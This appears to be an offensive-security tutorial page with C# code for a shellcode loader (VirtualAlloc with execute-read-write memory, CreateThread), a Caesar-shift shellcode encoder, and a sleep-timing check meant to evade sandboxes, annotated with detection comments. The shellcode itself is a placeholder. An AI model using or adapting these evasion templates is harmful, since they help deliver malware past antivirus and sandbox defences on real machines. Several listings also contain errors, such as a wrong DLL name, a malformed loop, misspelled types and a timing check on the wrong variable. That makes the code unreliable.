C# Runner

Using Caesar Cipher:

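Bypass signature detection using encoded shellcode and a custom C# runner. Note that the Caesar shift used here is a fixed one-byte offset, so it is obfuscation rather than encryption: it changes only the static byte pattern of the payload, while the decoded bytes in memory and the runner's API behaviour remain visible to emulation, memory scanning and behavioural detection.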

using System;
using System.Collections.Generic;
using System.Text;
using System.Linq;
using System.Threading.Tasks;
using System.Diagnostics;
using System.Runtime.InteropServices;

namespace Runner 
{
    /// <summary>
    /// Template for an in-process loader. Main decodes a byte array by subtracting 2 from
    /// every byte, copies the result into memory obtained from VirtualAlloc, starts a
    /// thread at that address with CreateThread and waits on the thread handle.
    /// </summary>
    /// <remarks>
    /// Detection view: the encoding only alters the bytes stored in the binary. The
    /// VirtualAlloc / Marshal.Copy / CreateThread sequence and the decoded buffer in memory
    /// are unchanged by it, so behavioural and memory-based detection still apply.
    /// </remarks>
    class Program
    {
        // P/Invoke declaration for VirtualAlloc; Main uses it to obtain the destination buffer.
        [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
        
        // P/Invoke declaration for CreateThread; Main passes the allocated buffer as lpStartAddress.
        [DllImport("kernel32.dll")]
        static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
        
        // P/Invoke declaration for WaitForSingleObject; Main uses it to block on the new thread.
        [DllImport("kernel.dll")]
        static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
        
            static void Main(string[] args)
            {
                // Placeholder: the page leaves the encoded byte array out, so this listing is a
                // template rather than a compilable unit.
                byte[] buff = //new byte[700]{ SHELL CODE }; CHANGE THIS
                // Reverse the encoder's +2 shift: subtract 2 from each byte, wrapping modulo 256.
                for (int i = 0; i < buff.Length; i++)
                {
                    buff[i] = (byte)(((uint)buff[i] - 2) & 0xFF);
                }
                int size = buff.Length;
                // 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE.
                // The region is a fixed 0x1000 bytes regardless of buff.Length, and the returned
                // pointer is not checked before use.
                // Detection: a private read-write-execute allocation is a common behavioural
                // indicator for in-memory loaders.
                IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
                Marshal.Copy(buff, 0, addr, size);
                // The thread entry point is the freshly written buffer, i.e. an address not backed
                // by any loaded module image; thread-creation telemetry and memory scanners key on this.
                IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
                // 0xFFFFFFFF is INFINITE: block until the created thread ends.
                WaitForSingleObject(hThread, 0xFFFFFFFF);
            }
        }
    
    }

Encryptor

using System;
using System.Collections.Generic;
using System.Text;
using System.Linq;
using System.Threading.Tasks;

namespace CaesarEncrypt
{
    /// <summary>
    /// Companion encoder for the runner listing: adds 2 to every byte of an input array
    /// (wrapping modulo 256) and prints the result as a comma-separated list of hex literals.
    /// </summary>
    /// <remarks>
    /// Detection view: a fixed additive offset has only 256 possible values and is applied
    /// identically to every byte, so the original bytes are recoverable by trying each
    /// offset. Signatures written against one encoded form are brittle; detection is
    /// better anchored on the loader's runtime behaviour than on these bytes.
    /// </remarks>
    class Program
    {
        static void Main(string[] args)
        {
            // Placeholder: the page leaves the input byte array out.
            byte[] buff = // new byte[700]{...SHELL CODE...}
            byte[] encoded = new byte[buff.Length];
            // Shift each byte by +2; the mask keeps the result within one byte.
            for (int i = 0, i < buff.Length; i++)
            {
                    encoded[i] = (byte)(((uint)buff[i] + 2) & 0xFF);
            }
            
            
            // Render each encoded byte as "0xNN, " (two lowercase hex digits).
            StringBuilder hexCode = new StringBuilder(encoded.Length * 2);
            foreach (byte x in encoded)
            {
                hexCode.AppendFormat("0x{0:x2}, ", x);
            }
            
            Console.WriteLine("Encrypted ShellCode:" + hexCode.ToString());
            
        }
    }
}

Bypass Heuristic Scan with Delay

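A Sleep call will be detected by a sandbox, which can skip the delay when inspecting our shell. The snippet below therefore measures the time that actually elapsed around the Sleep call and returns early if it is shorter than expected. For defenders, a sleep followed immediately by an elapsed-time comparison and an early exit is itself a behavioural indicator.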

...<snip>...

static extern void Sleep(uint dwMillioSeconds);

static void Main(string[] args)
{
    DateTime time1 = DateTime.Now;
    Sleep(3000);
    dobule time2 = DateTIme.Now.Subtract(time1).TotalSeconds;
    if (time1 < 2.5)
    {
        return;
    }
    
    ...<snip>...
